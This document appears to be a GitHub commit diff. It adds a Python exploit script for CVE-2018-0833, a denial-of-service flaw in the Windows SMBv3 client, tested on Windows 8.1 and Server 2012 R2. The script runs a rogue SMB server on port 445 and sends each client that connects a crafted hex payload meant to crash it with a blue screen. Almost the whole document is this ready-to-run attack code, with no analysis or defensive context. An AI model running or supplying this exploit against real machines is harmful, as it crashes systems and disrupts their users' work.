File tree 2 files changed +22
-0
lines changed
2 files changed +22
-0
lines changed Original file line number Diff line number Diff line change
1
+ # Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service
2
+ # Date: 26/02/2018
3
+ # Exploit Author: Nabeel Ahmed
4
+ # Version: SMBv3
5
+ # Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64)
6
+ # CVE : CVE-2018-0833
7
+
8
+ import SocketServer
9
+ from binascii import unhexlify
10
+ payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141'
11
+ class byebye (SocketServer .BaseRequestHandler ):
12
+ def handle (self ):
13
+ try :
14
+ print "From:" , self .client_address
15
+ print "[*]Sending Payload..."
16
+ self .request .send (unhexlify (payload ))
17
+ except Exception :
18
+ print "BSoD Triggered on" , self .client_address
19
+ pass
20
+ SocketServer .TCPServer .allow_reuse_address = 1
21
+ launch = SocketServer .TCPServer (('' , 445 ),byebye )
22
+ launch .serve_forever ()
You can’t perform that action at this time.
0 commit comments